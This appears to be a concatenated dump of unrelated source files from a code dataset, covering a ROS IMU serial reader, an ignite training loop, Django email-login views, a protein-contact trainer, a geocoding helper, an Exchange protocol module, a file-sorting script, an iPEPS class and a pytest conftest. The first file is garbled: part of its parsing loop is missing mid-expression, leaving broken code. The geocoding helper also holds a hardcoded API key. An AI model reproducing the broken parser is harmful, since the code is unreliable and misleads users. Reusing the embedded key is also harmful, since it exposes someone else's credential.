+{"seq_id":"421855677","text":"#!/usr/bin/env python\n\nimport roslib; roslib.load_manifest('imu_broadcaster')\nimport math\nimport rospy\nimport serial\nimport string\nimport numpy as np\nfrom geometry_msgs.msg import Quaternion\nimport tf\n\n# Buffer length\naddresses = ['C0:82:26:31:22:48','C0:82:38:31:5E:48','C0:82:1D:30:25:4D']\nadd_len = 6\nN_devices = len(addresses)\ncount_imu = 1\n# x=1:500000000;\n# N_samples = length(x);\n# R10 = eye(3,3);\n# R20 = eye(3,3);\n# R30 = eye(3,3);\nbuffLen = 34\npckLen = 27\ne = 0\nePrev = 0\nquat1 = [0]*4\nquat2 = [0]*4\nquat_total = []\nquat = [0]*4\nfor i in range(0, N_devices):\n quat_total.append(quat)\n \n\ndef parse_data(data):\n global quat_total\n showing = 0\n showing_index = 0\n RxBuff = [0]*buffLen\n RxBuff_prev = []\n ij_prev = 0\n counter = 1\n \n # if(cval==1)\n # count_imu = 1;\n # end\n for i in range(0, buffLen):\n # print ord(data[i])\n # print hex(ord(data[i]))\n # RxBuff[i] = ord(data[i])\n RxBuff[i] = (data[i])\n # if(RxBuff[i]==0xC0):\n # showing = 1\n # if(showing == 1):\n # print(hex(RxBuff[i]))\n # showing_index = showing_index +1\n # if(showing_index == 6):\n # showing = 0\n # # RxBuff = data\n ij = 0\n if(ij_prev>(buffLen-pckLen)):\n RxBuff = RxBuff_prev[ij_prev:len(RxBuff_prev)].extend(RxBuff)\n buffLen_new = len(RxBuff)\n \n while ij <= (buffLen_new-pckLen):\n found_device = 0\n address = ''\n for i in range(0, add_len):\n address = address + \"{:02X}\".format(RxBuff[ij+add_len-1-i])\n if(i=buffLen):\n parse_data(data)\n \n quat_sent = Quaternion()\n quat_sent.w = quat_total[0][0]\n quat_sent.x = quat_total[0][1]\n quat_sent.y = quat_total[0][2]\n quat_sent.z = quat_total[0][3]\n quat_fore_pub.publish(quat_sent)\n quat_sent = Quaternion()\n quat_sent.w = quat_total[1][0]\n quat_sent.x = quat_total[1][1]\n quat_sent.y = quat_total[1][2]\n quat_sent.z = quat_total[1][3]\n quat_should_pub.publish(quat_sent)\n quat_sent = Quaternion()\n quat_sent.w = quat_total[2][0]\n quat_sent.x = quat_total[2][1]\n quat_sent.y = quat_total[2][2]\n quat_sent.z = quat_total[2][3]\n quat_upper_pub.publish(quat_sent)\n # # Split the serial data into several words separated by space\n # words = data.split()\n # # Get the length of the data array\n # word_len = len(words)\n # rate.sleep()\n except KeyboardInterrupt:\n ser.close()\n print(\"Bye\")\n\nif __name__ == '__main__':\n try:\n read_wrist()\n except rospy.ROSInterruptException: pass","sub_path":"nodes/read_serial_imu.py","file_name":"read_serial_imu.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"486204109","text":"import os\nimport time\n\nimport torch\nimport torch.nn.functional as F\n\nimport ignite\nfrom ignite.engine import create_supervised_trainer\nfrom ignite.engine import create_supervised_evaluator\nfrom ignite.engine import Events\nfrom ignite.handlers.early_stopping import EarlyStopping\n\nimport backdoor_attack as bd\n\nclass Trainer:\n def __init__(self, train_ds, test_ds, model, device):\n self.train_ds = train_ds\n self.test_ds = test_ds\n self.model = model\n self.device = device\n self.util = bd.device_util(self.device)\n\n def run(self, optimizer, epoch, out):\n self.model.to(self.device)\n self.optimizer = optimizer(self.model.parameters())\n self.optimizer.step()\n\n trainer = create_supervised_trainer(\n self.model,\n self.optimizer,\n F.cross_entropy,\n device=self.device\n )\n\n evaluator = create_supervised_evaluator(\n self.model,\n metrics={\n 'acc' : ignite.metrics.Accuracy(),\n 'loss' : ignite.metrics.Loss(F.cross_entropy)\n },\n device=self.device\n )\n\n self.log = {\n 'train/loss': [],\n 'test/loss': [],\n 'train/accuracy': [],\n 'test/accuracy': []\n }\n\n self.max_acc = 0\n @trainer.on(Events.EPOCH_COMPLETED)\n def logger(engine):\n # Evaluation against training dataset\n evaluator.run(self.train_ds)\n tr_loss = evaluator.state.metrics['loss']\n tr_acc = evaluator.state.metrics['acc']\n\n # Evaluation against test dataset\n evaluator.run(self.test_ds)\n te_loss = evaluator.state.metrics['loss']\n te_acc = evaluator.state.metrics['acc']\n\n # Save the best model\n if te_acc > self.max_acc:\n self.max_acc = te_acc\n self.model.to('cpu')\n # Save result\n torch.save(self.model.state_dict(), os.path.join(out, 'best_model.pt'))\n self.model.to(self.device)\n\n # Report\n time_elp = time.time()-self.time_st\n print(\n \"{}/{} Epoch, Train/Test Loss: {:.4f}/{:.4f}, \\\n Train/Test Accuracy: {:.4f}/{:.4f}, \\\n Elapsed/Remaining time: {:.2f}/{:.2f} [min]\"\n .format(\n engine.state.epoch,\n engine.state.max_epochs,\n tr_loss,\n te_loss,\n tr_acc,\n te_acc,\n time_elp/60,\n ( (time_elp/engine.state.epoch) * (engine.state.max_epochs-engine.state.epoch) ) / 60\n )\n )\n\n # logs\n self.log['train/loss'].append(tr_loss)\n self.log['test/loss'].append(te_loss)\n self.log['train/accuracy'].append(tr_acc)\n self.log['test/accuracy'].append(te_acc)\n\n self.time_st = time.time()\n trainer.run(self.train_ds, max_epochs=epoch)\n self.time_elp = self.time_st - time.time()\n\n self.model.to('cpu')\n","sub_path":"backdoor_attack/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"653746367","text":"from django.shortcuts import render, redirect,reverse\nfrom django.core.mail import send_mail\nfrom django.contrib import messages,auth\nfrom accounts.models import Token\nimport sys\n\n# Create your views here.\n\n\ndef send_login_email(request):\n email = request.POST['email']\n token=Token.objects.create(email=email)\n url=request.build_absolute_uri(\n reverse('accounts:login')+'?token='+str(token.uid)\n )\n send_mail(\n 'Your login link for Superlists',\n 'Use this link to log in:\\n\\n'+url,\n 'jzl1091889012@163.com',\n [email]\n )\n\n messages.success(\n request,\n \"Check your email,we've sent you a link you can use to log in\"\n )\n\n # messages框架第二种写法\n # messages.add_message(\n # request,\n # messages.SUCCESS,\n # \"Check your email,we've sent you a link you can use to log in\"\n # )\n return redirect('/')\n\ndef login(request):\n print('login view',file=sys.stderr)\n uid=request.GET.get('token')\n user=auth.authenticate(uid=uid)\n if user is not None:\n auth.login(request,user)\n return redirect('/')","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"439256903","text":"import glob\nimport os\nimport prody\nfrom multiprocessing import Pool\nfrom compress_pickle import dump\n\ndef training_with_multiprocessing(radius, number_of_processors, path_training_folders):\n training_data = {}\n pool = Pool(processes=number_of_processors)\n multiple_results = []\n for folder in glob.glob(path_training_folders):\n pdb_list = glob.glob(os.path.join(folder, \"*.pdb\"))\n for pdb_file in pdb_list:\n multiple_results.append(pool.apply_async(environment_creator, (pdb_file, radius)))\n for result in multiple_results:\n observed_contacts_dictionary = result.get()\n for pair_residues, target_residue_dictionary in observed_contacts_dictionary.items():\n if pair_residues in training_data:\n for target_residue, observed_contacts in target_residue_dictionary.items():\n if target_residue in training_data[pair_residues]:\n training_data[pair_residues][target_residue] += observed_contacts\n else:\n training_data[pair_residues][target_residue] = observed_contacts\n else:\n training_data[pair_residues] = target_residue_dictionary\n pool.terminate()\n\n return training_data\n\ndef environment_creator(pdb_file, radius):\n observed_contacts_dictionary = {}\n radius = str(radius)\n pdb = prody.parsePDB(pdb_file)\n pdb_chains_list = pdb.getChids()\n\n for chain in set(pdb_chains_list):\n chain_interface = pdb.select('(ca same residue as within '+ radius +'.00 of (noh chain '+ chain +')) and not chain '+ chain +'')\n if chain_interface is None:\n continue\n\n for residue_id, number_id, chain_id, icode_id, atom_id in zip(chain_interface.getResnames(), chain_interface.getResnums(), chain_interface.getChids(), chain_interface.getIcodes(), chain_interface.getIndices().tolist()):\n if not icode_id:\n icode_id = \"_\"\n number_id = '`{}{}`'.format(str(number_id), icode_id)\n first_residue_picker = pdb.select('ca chain '+ chain_id +' and resid '+ number_id +'')\n first_residue_residue_id = list(first_residue_picker.getResnames())[0]\n\n residue_interface = pdb.select('(ca same residue as within '+ radius +'.00 of (noh resid '+ number_id +' and chain '+ chain_id +')) and not chain '+ chain_id +'')\n\n if residue_interface is None:\n continue\n\n residue_id_contact_list = list(residue_interface.getResnames().tolist())\n for res in residue_id_contact_list:\n observed_contacts_dictionary.setdefault(res, {}).setdefault(first_residue_residue_id, 0)\n observed_contacts_dictionary[res][first_residue_residue_id] += 1\n #print(observed_contacts_dictionary)\n return observed_contacts_dictionary\n\ndef main():\n path_training_folders=\"/home/pepamengual/UEPPi/ueppi_script/training/all_complexes/interactome_*\"\n radius = 4\n number_of_processors = 27\n training_data = training_with_multiprocessing(radius, number_of_processors, path_training_folders)\n dump(training_data, \"single_contact_matrix\", compression=\"lzma\", set_default_extension=False)\nmain()\n","sub_path":"predictor/single_contact_training.py","file_name":"single_contact_training.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"28530457","text":"from flask import app\nimport jieba\nimport datetime\nfrom itsdangerous import json\nimport requests\n\n\n# 加载初始化数据\ndef dataLoading():\n # 返回可选的建造年份\n years = []\n year = datetime.datetime.now().year\n while year - 10 >= 1980:\n interval = str(year - 10) + \"-\" + str(year)\n years.append(interval)\n print(interval)\n year -= 10\n\n # 返回可选房型\n roomType = ['1居室', '1室1厅', '2室1厅', '2室2厅', '3室1厅', '3室2厅', '4室1厅', '4室2厅']\n\n # 可选楼层类型\n floorType = ['低层', '中层', '高层']\n\n return roomType, floorType, years\n\n\n# 根据经纬度获取城市\ndef getCityNow(latitude, longitude):\n # 获取前端传来经纬度 并获取完整url\n url = 'http://api.map.baidu.com/reverse_geocoding/v3/?ak=nXyAXdETM2NjnmuABSvXSvliRvxGb5Em&output=json' \\\n '&coordtype=wgs84ll&location=' + latitude + ',' + longitude + '&oe=utf-8&format=json';\n\n # 访问api获取经纬度所对应的城市信息\n res = requests.get(url)\n res.encoding = 'utf-8'\n result = json.loads(res.text)[\"result\"][\"formatted_address\"]\n\n # 获取并返回省级行政区信息\n province = list(jieba.cut(result))[0] # jieba分割句子,得出省份\n city = list(jieba.cut(result))[1]\n dict = {'province': province, 'city': city}\n print(province + city)\n return dict\n","sub_path":"view/DataToHTML.py","file_name":"DataToHTML.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"26092636","text":"\"\"\"\nA protocol is an endpoint for EWS service connections. It contains all necessary information to make HTTPS connections.\n\nProtocols should be accessed through an Account, and are either created from a default Configuration or autodiscovered\nwhen creating an Account.\n\"\"\"\nimport socket\nimport queue\nfrom multiprocessing.pool import ThreadPool\nimport logging\nfrom collections import defaultdict\nfrom threading import Lock\nimport random\n\nfrom requests import adapters, Session\n\nfrom .credentials import Credentials\nfrom .errors import TransportError\nfrom .transport import get_auth_instance, get_service_authtype, get_docs_authtype, test_credentials, AUTH_TYPE_MAP\nfrom .version import Version, API_VERSIONS\nfrom .util import split_url\n\nlog = logging.getLogger(__name__)\n\n# Used to cache version and auth types for visited servers\n_server_cache = defaultdict(dict)\n_server_cache_lock = Lock()\n\n\ndef close_connections():\n for cached_key, cached_values in _server_cache.items():\n server = cached_key[0] # cached_key = server, username\n # Create a simple Protocol that we can close TCP connections on\n cached_protocol = Protocol(service_endpoint='https://%s/EWS/Exchange.asmx' % server,\n credentials=Credentials('', ''))\n cached_protocol.close()\n\n\nclass BaseProtocol:\n # Base class for Protocol which implements the bare essentials\n\n # The maximum number of sessions (== TCP connections, see below) we will open to this service endpoint. Keep this\n # low unless you have an agreement with the Exchange admin on the receiving end to hammer the server and\n # rate-limiting policies have been disabled for the connecting user.\n SESSION_POOLSIZE = 4\n # We want only 1 TCP connection per Session object. We may have lots of different credentials hitting the server and\n # each credential needs its own session (NTLM auth will only send credentials once and then secure the connection,\n # so a connection can only handle requests for one credential). Having multiple connections ser Session could\n # quickly exhaust the maximum number of concurrent connections the Exchange server allows from one client.\n CONNECTIONS_PER_SESSION = 1\n # Timeout for HTTP requests\n TIMEOUT = 120\n\n def __init__(self, service_endpoint, credentials, auth_type, verify_ssl):\n assert isinstance(credentials, Credentials)\n if auth_type is not None:\n assert auth_type in AUTH_TYPE_MAP, 'Unsupported auth type %s' % auth_type\n self.has_ssl, self.server, _ = split_url(service_endpoint)\n self.credentials = credentials\n self.service_endpoint = service_endpoint\n self.auth_type = auth_type\n self.verify_ssl = verify_ssl\n self._session_pool = None # Consumers need to fill the session pool themselves\n\n def close(self):\n log.debug('Server %s: Closing sessions', self.server)\n while True:\n try:\n self._session_pool.get(block=False).close_socket(self.service_endpoint)\n except queue.Empty:\n break\n\n def get_session(self):\n _timeout = 60 # Rate-limit messages about session starvation\n while True:\n try:\n log.debug('Server %s: Waiting for session', self.server)\n session = self._session_pool.get(timeout=_timeout)\n log.debug('Server %s: Got session %s', self.server, session.session_id)\n return session\n except queue.Empty:\n # This is normal when we have many worker threads starving for available sessions\n log.debug('Server %s: No sessions available for %s seconds', self.server, _timeout)\n\n def release_session(self, session):\n # This should never fail, as we don't have more sessions than the queue contains\n log.debug('Server %s: Releasing session %s', self.server, session.session_id)\n try:\n self._session_pool.put(session, block=False)\n except queue.Full:\n log.debug('Server %s: Session pool was already full %s', self.server, session.session_id)\n\n def retire_session(self, session):\n # The session is useless. Close it completely and place a fresh session in the pool\n log.debug('Server %s: Retiring session %s', self.server, session.session_id)\n session.close_socket(self.service_endpoint)\n del session\n self.release_session(self.create_session())\n\n def renew_session(self, session):\n # The session is useless. Close it completely and place a fresh session in the pool\n log.debug('Server %s: Renewing session %s', self.server, session.session_id)\n session.close_socket(self.service_endpoint)\n del session\n return self.create_session()\n\n def create_session(self):\n session = EWSSession(self)\n session.auth = get_auth_instance(credentials=self.credentials, auth_type=self.auth_type)\n # Leave this inside the loop because headers are mutable\n headers = {'Content-Type': 'text/xml; charset=utf-8', 'Accept-Encoding': 'compress, gzip'}\n session.headers.update(headers)\n scheme = 'https' if self.has_ssl else 'http'\n # We want just one connection per session. No retries, since we wrap all requests in our own retry handler\n session.mount('%s://' % scheme, adapters.HTTPAdapter(\n pool_block=True,\n pool_connections=self.CONNECTIONS_PER_SESSION,\n pool_maxsize=self.CONNECTIONS_PER_SESSION,\n max_retries=0\n ))\n log.debug('Server %s: Created session %s', self.server, session.session_id)\n return session\n\n def test(self):\n # We need the version for this\n try:\n socket.gethostbyname_ex(self.server)[2][0]\n except socket.gaierror as e:\n raise TransportError(\"Server '%s' does not exist\" % self.server) from e\n return test_credentials(protocol=self)\n\n def __repr__(self):\n return self.__class__.__name__ + repr((self.service_endpoint, self.credentials, self.auth_type,\n self.verify_ssl))\n\n\nclass Protocol(BaseProtocol):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n scheme = 'https' if self.has_ssl else 'https'\n self.wsdl_url = '%s://%s/EWS/Services.wsdl' % (scheme, self.server)\n self.messages_url = '%s://%s/EWS/messages.xsd' % (scheme, self.server)\n self.types_url = '%s://%s/EWS/types.xsd' % (scheme, self.server)\n\n # Acquire lock to guard against multiple threads competing to cache information. Having a per-server lock is\n # overkill.\n log.debug('Waiting for _server_cache_lock')\n with _server_cache_lock:\n _server_cache_key = self.server, self.credentials\n if _server_cache_key in _server_cache:\n # Get cached version and auth types and session / thread pools\n log.debug(\"Cache hit for server '%s'\", self.server)\n auth_type = self.auth_type\n for k, v in _server_cache[_server_cache_key].items():\n setattr(self, k, v)\n\n if auth_type:\n if auth_type != self.auth_type:\n # Some Exchange servers just can't make up their mind about which auth to prefer\n log.debug('Auth type mismatch on server %s. %s != %s' % (self.server, auth_type,\n self.auth_type))\n else:\n log.debug(\"Cache miss. Adding server '%s', poolsize %s, timeout %s\", self.server, self.SESSION_POOLSIZE,\n self.TIMEOUT)\n # Autodetect authentication type if necessary\n if not self.auth_type:\n self.auth_type = get_service_authtype(service_endpoint=self.service_endpoint, versions=API_VERSIONS,\n verify=self.verify_ssl)\n self.docs_auth_type = get_docs_authtype(verify=self.verify_ssl, docs_url=self.types_url)\n\n # Try to behave nicely with the Exchange server. We want to keep the connection open between requests.\n # We also want to re-use sessions, to avoid the NTLM auth handshake on every request.\n self._session_pool = queue.LifoQueue(maxsize=self.SESSION_POOLSIZE)\n for i in range(self.SESSION_POOLSIZE):\n self._session_pool.put(self.create_session(), block=False)\n\n # Used by services to process service requests that are able to run in parallel. Thread pool should be\n # larger than connection the pool so we have time to process data without idling the connection.\n thread_poolsize = 4 * self.SESSION_POOLSIZE\n self.thread_pool = ThreadPool(processes=thread_poolsize)\n\n # Needs auth objects and a working session pool\n self.version = Version.guess(self)\n\n # Cache results\n _server_cache[_server_cache_key] = dict(\n version=self.version,\n auth_type=self.auth_type,\n docs_auth_type=self.docs_auth_type,\n thread_pool=self.thread_pool,\n _session_pool=self._session_pool,\n )\n log.debug('_server_cache_lock released')\n\n def __str__(self):\n return '''\\\nEWS url: %s\nProduct name: %s\nEWS API version: %s\nBuild number: %s\nEWS auth: %s\nXSD auth: %s''' % (\n self.service_endpoint,\n self.version.fullname,\n self.version.api_version,\n self.version.build,\n self.auth_type,\n self.docs_auth_type,\n )\n\n\nclass EWSSession(Session):\n # A requests Session object that closes the underlying socket when we need it\n def __init__(self, protocol):\n self.session_id = random.randint(1, 32767) # Used for debugging messages in services\n self.protocol = protocol\n super().__init__()\n\n def close_socket(self, url):\n # Close underlying socket. This ensures we don't leave stray sockets around after program exit.\n adapter = self.get_adapter(url)\n pool = adapter.get_connection(url)\n for i in range(pool.pool.qsize()):\n conn = pool._get_conn()\n if conn.sock:\n log.debug('Closing socket %s', str(conn.sock.getsockname()))\n conn.sock.shutdown(socket.SHUT_RDWR)\n conn.sock.close()\n\n def __enter__(self):\n return super().__enter__()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if exc_type is None:\n self.protocol.release_session(self)\n else:\n self.protocol.retire_session(self)\n # return super().__exit__() # We want to close the session socket explicitly\n","sub_path":"exchangelib/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":10999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"458605748","text":"import csv\nimport logging\nimport os\nimport pdb\n\nfrom tqdm import tqdm\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n\"\"\"\nThis script should read in the existing train/ set of documents\nand pull out documents that we know that Digikey has and put them\ninto a separate dir for comparison purposes.\n\"\"\"\n\n\ndef get_digikey_filenames(goldfile):\n \"\"\"Returns a set of all filenames found in Digikey's gold csv.\"\"\"\n digikey_filenames = set()\n with open(goldfile, \"r\") as gold:\n reader = csv.reader(gold)\n for line in reader:\n filename = line[0]\n digikey_filenames.add(filename.upper())\n if len(digikey_filenames) != 0:\n return digikey_filenames\n else:\n logger.error(f\"No digikey filenames found in {goldfile}.\")\n pdb.set_trace()\n\n\ndef get_valid_filenames(dirname, digikey_filenames):\n \"\"\"Returns a sest of filenames that are found both in\n Digikey's gold CSV and in the target dataset directory.\"\"\"\n valid_filenames = set()\n logger.info(f\"Getting valid filenames from {dirname}\")\n for filename in tqdm(os.listdir(dirname)):\n if filename.endswith(\".pdf\") or filename.endswith(\".PDF\"):\n if filename.upper().replace(\".PDF\", \"\") in digikey_filenames:\n valid_filenames.add(filename.replace(\".pdf\", \"\").replace(\".PDF\", \"\"))\n if len(valid_filenames) != 0:\n return valid_filenames\n else:\n logger.error(f\"No valid filenames found in {dirname}.\")\n pdb.set_trace()\n\n\ndef move_valid_files(pdf, html, valid_filenames, limit=100, out=\"analysis/\"):\n \"\"\"Moves all filenames found in valid_filenames into an analysis\n dataset directory for comparison.\"\"\"\n endpath = os.path.join(os.path.dirname(__file__), out)\n # if len(valid_filenames) < limit:\n # logger.error(\n # f\"{len(valid_filenames)} valid filenames is \"\n # + f\"not enough to satisfy limit of {limit}.\"\n # )\n # pdb.set_trace()\n # elif len(valid_filenames) != limit:\n # valid_filenames = set(list(valid_filenames)[:limit])\n logger.info(f\"Moving {len(valid_filenames)} files into {out} from {pdf} and {html}\")\n for i, filename in enumerate(tqdm(valid_filenames)):\n if filename + \".pdf\" in os.listdir(pdf):\n os.rename(\n os.path.join(pdf, filename + \".pdf\"),\n os.path.join(endpath + \"pdf/\", filename + \".pdf\"),\n )\n elif filename + \".PDF\" in os.listdir(pdf):\n os.rename(\n os.path.join(pdf, filename + \".PDF\"),\n os.path.join(endpath + \"pdf/\", filename + \".pdf\"),\n )\n else:\n logger.error(f\"Filename {filename} not found in {pdf}\")\n pdb.set_trace()\n if filename + \".html\" in os.listdir(html):\n os.rename(\n os.path.join(html, filename + \".html\"),\n os.path.join(endpath + \"html/\", filename + \".html\"),\n )\n elif filename + \".HTML\" in os.listdir(html):\n os.rename(\n os.path.join(html, filename + \".HTML\"),\n os.path.join(endpath + \"html/\", filename + \".html\"),\n )\n else:\n logger.error(f\"Filename {filename} not found in {html}\")\n pdb.set_trace()\n if i >= limit:\n return\n\n\nif __name__ == \"__main__\":\n\n # Run extraction on dev set\n dirname = os.path.dirname(__file__)\n pdfdir = os.path.join(dirname, \"../../dev/pdf/\")\n htmldir = os.path.join(dirname, \"../../dev/html\")\n gold_file = os.path.join(dirname, \"../../standard_digikey_gold.csv\")\n\n digikey_filenames = get_digikey_filenames(gold_file)\n\n filenames = get_valid_filenames(pdfdir, digikey_filenames)\n move_valid_files(pdfdir, htmldir, filenames, out=\"../../analysis/\")\n\n # Run extraction on test set\n pdfdir = os.path.join(dirname, \"../../test/pdf/\")\n htmldir = os.path.join(dirname, \"../../test/html\")\n\n digikey_filenames = get_digikey_filenames(gold_file)\n\n filenames = get_valid_filenames(pdfdir, digikey_filenames)\n move_valid_files(pdfdir, htmldir, filenames, out=\"../../analysis/\")\n","sub_path":"hack/transistors/data/utils/analysis/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"280513186","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 23 15:06:56 2018\n\n@author: yyk\n\"\"\"\n\n\nfrom __future__ import division\n\nimport tensorflow as tf\nimport Get_data\nimport OCN\nimport Option\nimport os\nimport numpy as np\nimport Log\nimport matplotlib.pyplot as plt\n\nos.environ['CUDA_VISIBLE_DEVICES']='1'\nconfig=tf.ConfigProto()\nconfig.gpu_options.allow_growth=True\n\ndataset_name='mnist'\nresult_path='../transderlearning_experiment/'\nif not os.path.isdir(result_path):\n os.mkdir(result_path)\n os.mkdir(result_path+dataset_name)\nresult_path=result_path+dataset_name+'/'\n\nlog_path=result_path+'log.txt'\n\ndef save_img(imgs,path):\n if not os.path.exists(result_path+path):\n os.mkdir(result_path+path)\n for i in range(imgs.shape[0]): \n plt.figure(figsize=(4.32,2.88))\n if i%50==0:\n print('saving '+path+':',i)\n plt.imshow((imgs[i,:,:,0]),cmap='gray',interpolation=\"bicubic\")\n plt.savefig(result_path+path+'/'+str(i)+'.jpg')\n plt.close() \n\n\nLog.Log(log_path, 'w+', 1) # set log file\n\nfine_tfrecords_trainpath='../transferlearning_dataset/mnist_train_data.tfrecords'\nfine_tfrecords_testpath='../transferlearning_dataset/mnist_test_data.tfrecords'\n\n\ntrain_data_batch,train_label_batch=Get_data.read_and_decode(fine_tfrecords_trainpath, batch_size=Option.batch_size,data_name='train_data',label_name='train_label')\ntest_data_batch,test_label_batch=Get_data.read_and_decode(fine_tfrecords_testpath, batch_size=Option.batch_size,data_name='test_data',label_name='test_label')\n\n\n\ntrain_imgs=OCN.build(train_data_batch,Option.channel,is_training=False,fine_tuning=False,keep_prob=0.3)\ntest_imgs=OCN.build(test_data_batch,Option.channel,is_training=False,fine_tuning=False,keep_prob=1.0)\n\n\n\n\nl2_loss_op=OCN.l2_loss(name='train_l2_loss_op')\n\n\n\ntrain_sharp_loss_op=OCN.sharpness(train_imgs,train_label_batch,name='train_sharp_loss_op')\ntrain_mse_loss_op=OCN.mse_loss(train_imgs,train_label_batch,name='test_mse_loss_op')\ntrain_loss_op=tf.add(l2_loss_op+train_sharp_loss_op+train_mse_loss_op,0.0,name='train_loss')\n\n\n\ntest_sharp_loss_op=OCN.sharpness(test_imgs,test_label_batch,name='train_sharp_loss_op')\ntest_mse_loss_op=OCN.mse_loss(test_imgs,test_label_batch,name='test_mse_loss_op')\ntest_loss_op=tf.add(l2_loss_op+test_sharp_loss_op+test_mse_loss_op,0.0,name='train_loss')\n\n\nglobal_step = tf.Variable(0, name = 'global_step', trainable = False)\n \nfine_tuing_op=OCN.fine_tune9(train_loss_op,Option.learning_rate,Option.learning_rate_decay_steps,Option.learning_rate_decay_rate,\\\n global_step,name='fine_tuing_op')\n\n\n\n \n#total_loss_op=tf.add(l2_loss_op+sharp_loss_op+mse_loss_op,0.0,name='train_total_loss_op') \n \ninit_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\nsess=tf.Session(config=config)\nsess.run(init_op)\n\n\nmodel_path='../training_experiment/2019-10-22-12:34:24/model/'\n\n\n\n\n\nmodel_file=tf.train.latest_checkpoint(model_path)\nSaver=tf.train.Saver()\nSaver.restore(sess,model_file)\n\n\n\n\n\ncoord=tf.train.Coordinator()\nthreads=tf.train.start_queue_runners(sess=sess,coord=coord) \nstep=0\n\nprint('<<<<<<<<<<>>>>>>>>>>')\nmodel_imgs=sess.run(test_imgs)\nif not os.path.exists(result_path+'data'):\n os.mkdir(result_path+'data')\nnp.save(result_path+'/data/'+'model_imgs.npy',model_imgs)\nsave_img(model_imgs,'model_imgs(before finetuning)')\n\n\ntest_imgs_list=[]\n\ntry:\n while not coord.should_stop():\n if step%10==0:\n test_imgs_,test_label_imgs_,test_mse_,test_sharp_loss_,test_loss_=sess.run([test_imgs,test_label_batch,\\\n test_mse_loss_op,test_sharp_loss_op,test_loss_op])\n print('<<<<< a[s,u,l,d,r]\n |\n d\n \n where s denotes physical index, and u,l,d,r label four principal directions\n up, left, down, right in anti-clockwise order starting from up.\n \"\"\"\n assert isinstance(site,torch.Tensor), \"site is not a torch.Tensor\"\n super().__init__(dict({(0,0): site}),peps_args=peps_args,\\\n global_args=global_args)\n\n def site(self,coord=None):\n return self.sites[(0,0)]\n\n def add_noise(self,noise,symmetrize=False):\n r\"\"\"\n :param noise: magnitude of the noise\n :type noise: float\n\n Take IPEPS and add random uniform noise with magnitude ``noise`` to on-site tensor\n \"\"\"\n rand_t = torch.rand( self.site().size(), dtype=self.dtype, device=self.device)\n self.sites[(0,0)]= self.site() + noise * rand_t\n if symmetrize:\n self.sites[(0,0)]= make_c4v_symm(self.site())\n\n def write_to_file(self,outputfile,symmetrize=True,**kwargs):\n # symmetrize before writing out\n tmp_t= make_c4v_symm(self.site()) if symmetrize else self.site()\n tmp_state= IPEPS_C4V(tmp_t)\n ipeps.write_ipeps(tmp_state, outputfile,**kwargs)\n\ndef extend_bond_dim(state, new_d):\n return ipeps.extend_bond_dim(state, new_d)\n\ndef to_ipeps_c4v(state, normalize=False):\n assert len(state.sites.items())==1, \"state has more than a single on-site tensor\"\n A= next(iter(state.sites.values()))\n A= make_c4v_symm(A)\n # if normalize: A= A/torch.max(torch.abs(A))\n if normalize: A= A/A.norm()\n return IPEPS_C4V(A)\n\ndef read_ipeps_c4v(jsonfile, aux_seq=[0,1,2,3], peps_args=cfg.peps_args,\\\n global_args=cfg.global_args):\n r\"\"\"\n :param jsonfile: input file describing IPEPS_C4V in json format\n :param aux_seq: array specifying order of auxiliary indices of on-site tensors stored\n in `jsonfile`\n :param peps_args: ipeps configuration\n :param global_args: global configuration\n :type jsonfile: str or Path object\n :type aux_seq: list[int]\n :type peps_args: PEPSARGS\n :type global_args: GLOBALARGS\n :return: wavefunction\n :rtype: IPEPS_C4V\n \n Parameter ``aux_seq`` defines the expected order of auxiliary indices\n in input file relative to the convention fixed in tn-torch::\n \n 0\n 1A3 <=> [up, left, down, right]: aux_seq=[0,1,2,3]\n 2\n \n for alternative order, eg.\n \n 1\n 0A2 <=> [left, up, right, down]: aux_seq=[1,0,3,2] \n 3\n \"\"\"\n state= ipeps.read_ipeps(jsonfile, aux_seq=aux_seq, peps_args=peps_args,\\\n global_args=global_args)\n assert len(state.sites.items())==1, \"state has more than a single on-site tensor\"\n return IPEPS_C4V(next(iter(state.sites.values())))\n","sub_path":"ipeps/ipeps_c4v.py","file_name":"ipeps_c4v.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"494354726","text":"from redis import Redis\nimport pytest\n\n# to allow us to run all tests that have no markings as -m unmarked\ndef pytest_collection_modifyitems(items, config):\n for item in items:\n if not any(item.iter_markers()):\n item.add_marker(\"unmarked\")\n\n\ndef skip_ifmodversion_lt(min_version: str, module_name: str):\n rc = Redis()\n modules = rc.execute_command(\"module list\")\n if modules is None:\n return\n\n version = None\n for module_info in modules:\n if module_info[b\"name\"] == module_name.encode():\n version = int(module_info[b\"ver\"])\n\n if version is None:\n raise AttributeError(\"No redis module named {}\".format(module_name))\n mv = int(min_version.replace(\".\", \"\"))\n check = version < mv\n return pytest.mark.skipif(check, reason=\"Redis module version\")\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
